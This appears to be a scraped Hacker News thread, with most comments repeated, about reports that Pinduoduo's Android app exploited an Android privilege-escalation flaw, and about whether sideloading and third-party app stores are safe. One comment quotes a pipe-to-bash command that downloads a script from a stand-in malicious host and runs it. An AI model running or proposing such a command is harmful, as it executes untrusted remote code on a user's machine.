Chinese apps, even those from big established players, are often indistinguishable from malware. Off the top of my head, I can think of:
- Hiding their app icon from launcher, but add a widget that looks the same. So if the user tries to uninstall the app, they just deleted the widget and the app remains.
- One app would install other apps from the same company in the background without user consent.
- Multiple apps will wake each other so they always stay in the background and become impossible to kill
- Requesting every permission under the sun and transmit as much info to the mothership as possible
- Secretly turning on the camera and film their users
However, these only happen on Android version. iOS version never have these issues.
So even though I am not a fan of the Apple monopoly, I am really really afraid that by allowing third party app stores and sideloading, the western apps will race to the bottom and become just like this.
("But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and available only via direct download?)
Well, apps that don't have a declared launchable (homescreen) UI don't get these icons. Granted it has been abused by spyware apps to "hide" from unsuspecting users, but you'll find these in Android's Settings app.
> One app would install other apps from the same company in the background without user consent.
I doubt installation without user consent is possible at all in Android 9+. Afaik, only Google PlayStore (or other OEM embedded stores) have permissions to silent install, as it were. And I haven't seen anyone allege PlayStore silently installing apps. See also: https://www.xda-developers.com/android-14-background-install...
> Multiple apps will wake each other so they always stay in the background and become impossible to kill
One can Force Stop an app to make sure no component (service, activity, recievers, or resolvers) can run in the background, until the user explicitly starts the app process again via the Launcher.
Android also limits background processes, tracks per-app CPU and memory use to limit it, and "caches" processes aggresively if need be (puts their threads to sleep so they aren't executing anything but could be resumed quickly).
> Requesting every permission under the sun and transmit as much info to the mothership as possible
The Trust on First Use model has been taken to the cleaners by Android apps hell bent on tracking their users. Starting Android 12 though, Android auto removes permissions granted from installed apps user hasn't interacted with.
> Secretly turning on the camera and film their users
Android 13+ has camera and mic indicators. And for earlier versions, even if inconvenient for end users to setup, there exist open source apps that continuously log cam or mic access from other apps.
The security argument for the App Store has never been stronger.
> "But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and available only via direct download?
> I am really really afraid that by allowing third party app stores and sideloading
please stop it. I do not want my devices to become a toaster. I am a computer programmer. I would like the ability to write programs for my own personal use, and run those on my own devices THAT I PAID FOR. please stop pushing some narrative that will take this ability away from me.
> ("But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and available only via direct download?)
Personal freedom always has personal responsibility attached. If you direct download it and it's malicious, well, that's your own problem. Probably should've thought about it better.
If you don't want to think about security, all you have to do is only install apps that are in the app store. Why should everyone else be restricted from doing whatever they want with their phones?
> So even though I am not a fan of the Apple monopoly, I am really really afraid that by allowing third party app stores and sideloading, the western apps will race to the bottom and become just like this.
This did not happen with Windows, so why would it happen with Android, that is much more restrictive in terms of permissions?
(Off topic, but does someone know a good alternative to imgur? The website currently autoplays unrelated videos, freezes my mobile browser for several seconds, and appears to hijack the back button. It feels like malware.)
To be fair, there are plenty of legitimate reasons to hire a reverse engineer. Maybe you're building a red team to your AppSec blue team, or you want to analyze the apps of your competitors, or any apps at the top of the App Store (you'd be shocked at the dark patterns you can uncover by looking at newly trending apps).
Maybe because I'm from a different era, but installing anything on a device from a website is an extremely risky game. There is a reason we moved toward using a web browser to do functionality that was typically done on desktop.
I'm not one to worship Google's walled garden(which is just marketing jargon), but at least that has some layer of verification and malware detection.
I still dream of a web app based future. Then we only need to security proof 1 app.
> A new set of Android malware, phishing, and adware apps have infiltrated the Google Play store, tricking over two million people into installing them.
> Maybe because I'm from a different era, but installing anything on a device from a website is an extremely risky game
You are (just like me) from a different era. /s
I was trying to compile rust (for mozilla) and i was shocked to see that it connects to the internet during the build process to download crates (i presume these are some kind of libraries). Then you have js with npm and the menu is served.
Even if the web browser has a container, this can be compromised during the build process.
That's like saying "in a native-based future we only need to security proof the OS". There's no free lunch, you always need to check both the sandbox layer and the application.
Which era is that, though? There was a decently-long stretch of time between shrink-wrap software being common (I think my last boxed software purchase was probably in the late 90s), and the advent of the App Store (2008). During that time, downloading things from a website was the primary method of installing software.
Also, it's not like people were installing this app from a random sketchy website; it appears to have been available on third-party Android app stores, which are the only option in China, since the Google Play Store isn't allowed there.
> I still dream of a web app based future.
Right there with you, but sadly, I don't think it's a realistic hope.
With the capabilities web apps have gathered over the years, I don't feel very comfortable with using random web apps either. As an added downside, random blog posts and ad iframes can now try to access the same APIs real web apps can. The more we move to a web app based reality, the more we're going to see exploitation of browsers and their many features.
We'll never get our one security proof app because security proof apps can't do things like rendering and file manipulation at acceptable speeds.
Downloading apps from websites is almost always a red flag in my opinion. If an app can't be in Google's app store for whatever reason, it surely can appear in another.
The only APKs I've downloaded come from Github/Gitlab because open source apps aren't always on F-Droid, and APKmirror because my phone is rooted, and I consider myself to be a power user. I'm really surprised an app like this is popular enough to get downloaded installs at all, though perhaps the Chinese app ecosystem is different enough that I simply can't understand.
I'd hate to have to resort to web apps for absolutely everything on my phone. Messengers and such need optimisations for battery usage and resources and browsers don't offer any of that. The overhead of web applications is also quite significant. Don't get me wrong, I use several web apps for small things like weather sites and a simole game here or there, but there has to be room for both or the mobile experience will get worse for everyone.
therefore I can't download Netflix from Google Play for some absolutely idiotic reason even though the stupid app works perfectly afterwards. They just hate me for wanting to sync my clipboard automatically, I'm guessing.
> Lookout’s forensic analysis of two Pinduoduo APK app samples released prior to March 5 ... has determined that both contain malicious code that exploits CVE-2023-20963, the Android privilege-escalation vulnerability that wouldn’t become public until March 6 and wouldn’t be patched in user devices for up to two weeks later.
Temu (Pinduoduo's American app) appears to be unaffected and is still #1 on the app store and even has an "Editors Choice" badge, but with their parent company risking reputational harm on their main app I would be cautious.
Google should block all of their app signing keys, and only allow new ones when PDD can explain how malicious software was signed with the previous ones.
> Pinduoduo's core value is "本分" (Ben Fen). It is difficult to express it perfectly in English, but it essentially means to adhere firmly to one's own duties and principles. There are several layers of meaning here:
> Be honest and trustworthy;
> Discharge our own duties and responsibilities regardless of others' conduct;
> Never take advantage of others even when we are in a position to do so;
> Self-reflect and take responsibilities when problems arise instead of blaming others.
I guess the company's app developers never got the memo.
This is a refreshingly honest core value. To me, 本分 is better translated as "know your place". I.e. don't be ambitious, don't step out of line and always do exactly what the boss tells you to do, never a stroke more.
> The source[0] has a more clear description about what is being currently exploited:
In the end, the Internet vendor used the above-mentioned series of concealed hacking techniques to achieve:
Concealed installation, increase installed capacity
Counterfeit boost DAU/MAU
Users cannot uninstall
Attacking Competitor Apps
Steal user privacy data
Evasion of privacy compliance regulations
and other suspected illegal purposes.
These fake apps were signed with the signing key of the official PinDuoDuo app. Until PinDuoDuo can explain how this signing key was "stolen" they are to blame for creating this malware.
The EvilParcel saga seems quite tragic. You would think after the first few repeats they would have taken some stronger measures than patch up the new API misuse case of the day.
Anyone from China or informed enough can chip in how secure the marketplace is? How often does this happen? I had my own problems with a Chinese developed app I needed to add some content for a client.
It's interesting how the headline writer chose to include "from China". If the developer had been French of American, would they have included "from France", or "From America"?
From the article:
The malicious versions of the Pinduoduo app were available in third-party markets, which users in China and elsewhere rely on because the official Google Play market is off-limits or not easy to access. No malicious versions were found in Play or Apple’s App Store. Last Monday, TechCrunch reported that Pinduoduo was pulled from Play after Google discovered a malicious version of the app available elsewhere. TechCrunch reported the malicious apps available in third-party markets exploited several zero-days, vulnerabilities that are known or exploited before a vendor has a patch available.
As far as I know, China is the only country that has 3rd-party Android app markets of that size because Google Play is literally not allowed there. So I don't think this would be a significant story anywhere else in the world.
It's a company with 750M MAU, so very large but still not something most US readers would be aware of. If it was a French or US developer, they would have just used the name of it.
[+] [-] HeavenFox|3 years ago|reply
- Hiding their app icon from launcher, but add a widget that looks the same. So if the user tries to uninstall the app, they just deleted the widget and the app remains.
- One app would install other apps from the same company in the background without user consent.
- Multiple apps will wake each other so they always stay in the background and become impossible to kill
- Requesting every permission under the sun and transmit as much info to the mothership as possible
- Secretly turning on the camera and film their users
However, these only happen on Android version. iOS version never have these issues.
So even though I am not a fan of the Apple monopoly, I am really really afraid that by allowing third party app stores and sideloading, the western apps will race to the bottom and become just like this.
("But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and available only via direct download?)
[+] [-] ignoramous|3 years ago|reply
> Hiding their app icon from launcher...
Well, apps that don't have a declared launchable (homescreen) UI don't get these icons. Granted it has been abused by spyware apps to "hide" from unsuspecting users, but you'll find these in Android's Settings app.
> One app would install other apps from the same company in the background without user consent.
I doubt installation without user consent is possible at all in Android 9+. Afaik, only Google PlayStore (or other OEM embedded stores) have permissions to silent install, as it were. And I haven't seen anyone allege PlayStore silently installing apps. See also: https://www.xda-developers.com/android-14-background-install...
> Multiple apps will wake each other so they always stay in the background and become impossible to kill
One can Force Stop an app to make sure no component (service, activity, recievers, or resolvers) can run in the background, until the user explicitly starts the app process again via the Launcher.
Android also limits background processes, tracks per-app CPU and memory use to limit it, and "caches" processes aggresively if need be (puts their threads to sleep so they aren't executing anything but could be resumed quickly).
> Requesting every permission under the sun and transmit as much info to the mothership as possible
The Trust on First Use model has been taken to the cleaners by Android apps hell bent on tracking their users. Starting Android 12 though, Android auto removes permissions granted from installed apps user hasn't interacted with.
> Secretly turning on the camera and film their users
Android 13+ has camera and mic indicators. And for earlier versions, even if inconvenient for end users to setup, there exist open source apps that continuously log cam or mic access from other apps.
None of this is perfect, mind you; but I wanted to point out that Android has been responding to growing privacy concerns: https://security.googleblog.com/2022/12/app-defense-alliance...
[+] [-] otterley|3 years ago|reply
The security argument for the App Store has never been stronger.
> "But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and available only via direct download?
... and nothing of value was lost.
[+] [-] 2h|3 years ago|reply
please stop it. I do not want my devices to become a toaster. I am a computer programmer. I would like the ability to write programs for my own personal use, and run those on my own devices THAT I PAID FOR. please stop pushing some narrative that will take this ability away from me.
[+] [-] alex7734|3 years ago|reply
Personal freedom always has personal responsibility attached. If you direct download it and it's malicious, well, that's your own problem. Probably should've thought about it better.
If you don't want to think about security, all you have to do is only install apps that are in the app store. Why should everyone else be restricted from doing whatever they want with their phones?
[+] [-] saagarjha|3 years ago|reply
This is not true. It’s much rarer but there’s nothing special about iOS in this regard when it comes to abusing 0-days.
[+] [-] cubefox|3 years ago|reply
This did not happen with Windows, so why would it happen with Android, that is much more restrictive in terms of permissions?
[+] [-] secondcoming|3 years ago|reply
It was pretty much impossible on Symbian OS.
[+] [-] jonatron|3 years ago|reply
Edit: Replaced imgur link
[+] [-] cubefox|3 years ago|reply
[+] [-] chatmasta|3 years ago|reply
[+] [-] hospitalJail|3 years ago|reply
I'm not one to worship Google's walled garden(which is just marketing jargon), but at least that has some layer of verification and malware detection.
I still dream of a web app based future. Then we only need to security proof 1 app.
[+] [-] 2OEH8eoCRo0|3 years ago|reply
> A new set of Android malware, phishing, and adware apps have infiltrated the Google Play store, tricking over two million people into installing them.
https://lifehacker.com/great-now-the-apple-app-store-has-mal...
> Security researchers found malware in several popular App Store apps.
[+] [-] hulitu|3 years ago|reply
You are (just like me) from a different era. /s
I was trying to compile rust (for mozilla) and i was shocked to see that it connects to the internet during the build process to download crates (i presume these are some kind of libraries). Then you have js with npm and the menu is served.
Even if the web browser has a container, this can be compromised during the build process.
[+] [-] rhn_mk1|3 years ago|reply
[+] [-] kelnos|3 years ago|reply
Also, it's not like people were installing this app from a random sketchy website; it appears to have been available on third-party Android app stores, which are the only option in China, since the Google Play Store isn't allowed there.
> I still dream of a web app based future.
Right there with you, but sadly, I don't think it's a realistic hope.
[+] [-] SoftTalker|3 years ago|reply
curl https://malicious.example.com/useful_thing | bash
and its variants?
[+] [-] jeroenhd|3 years ago|reply
We'll never get our one security proof app because security proof apps can't do things like rendering and file manipulation at acceptable speeds.
Downloading apps from websites is almost always a red flag in my opinion. If an app can't be in Google's app store for whatever reason, it surely can appear in another.
The only APKs I've downloaded come from Github/Gitlab because open source apps aren't always on F-Droid, and APKmirror because my phone is rooted, and I consider myself to be a power user. I'm really surprised an app like this is popular enough to get downloaded installs at all, though perhaps the Chinese app ecosystem is different enough that I simply can't understand.
I'd hate to have to resort to web apps for absolutely everything on my phone. Messengers and such need optimisations for battery usage and resources and browsers don't offer any of that. The overhead of web applications is also quite significant. Don't get me wrong, I use several web apps for small things like weather sites and a simole game here or there, but there has to be room for both or the mobile experience will get worse for everyone.
therefore I can't download Netflix from Google Play for some absolutely idiotic reason even though the stupid app works perfectly afterwards. They just hate me for wanting to sync my clipboard automatically, I'm guessing.
[+] [-] eekfuh|3 years ago|reply
[+] [-] pavon|3 years ago|reply
> Lookout’s forensic analysis of two Pinduoduo APK app samples released prior to March 5 ... has determined that both contain malicious code that exploits CVE-2023-20963, the Android privilege-escalation vulnerability that wouldn’t become public until March 6 and wouldn’t be patched in user devices for up to two weeks later.
[+] [-] jgalt212|3 years ago|reply
> Google patched in updates that became available to end users two weeks ago.
[+] [-] sct202|3 years ago|reply
[+] [-] pavon|3 years ago|reply
[+] [-] screamingninja|3 years ago|reply
> Pinduoduo's core value is "本分" (Ben Fen). It is difficult to express it perfectly in English, but it essentially means to adhere firmly to one's own duties and principles. There are several layers of meaning here:
> Be honest and trustworthy;
> Discharge our own duties and responsibilities regardless of others' conduct;
> Never take advantage of others even when we are in a position to do so;
> Self-reflect and take responsibilities when problems arise instead of blaming others.
I guess the company's app developers never got the memo.
[+] [-] alisonatwork|3 years ago|reply
[+] [-] unknown|3 years ago|reply
[deleted]
[+] [-] lalopalota|3 years ago|reply
Looks like they nailed that one.
[+] [-] textread|3 years ago|reply
> The source[0] has a more clear description about what is being currently exploited: In the end, the Internet vendor used the above-mentioned series of concealed hacking techniques to achieve:
[0] https://mp.weixin.qq.com/s/P_EYQxOEupqdU0BJMRqWsw[+] [-] kernal|3 years ago|reply
[+] [-] rfoo|3 years ago|reply
[+] [-] fulafel|3 years ago|reply
[+] [-] yorwba|3 years ago|reply
[+] [-] superb-owl|3 years ago|reply
[+] [-] akira2501|3 years ago|reply
The actual monopoly they enjoy or the remote control of my devices aren't the real solutions to this problem.
[+] [-] prox|3 years ago|reply
[+] [-] unknown|3 years ago|reply
[deleted]
[+] [-] asplake|3 years ago|reply
[+] [-] cubefox|3 years ago|reply
[+] [-] unknown|3 years ago|reply
[deleted]
[+] [-] flutterdev|3 years ago|reply
[deleted]
[+] [-] RobotToaster|3 years ago|reply
[+] [-] PakG1|3 years ago|reply
As far as I know, China is the only country that has 3rd-party Android app markets of that size because Google Play is literally not allowed there. So I don't think this would be a significant story anywhere else in the world.
[+] [-] tyrfing|3 years ago|reply
[+] [-] smm11|3 years ago|reply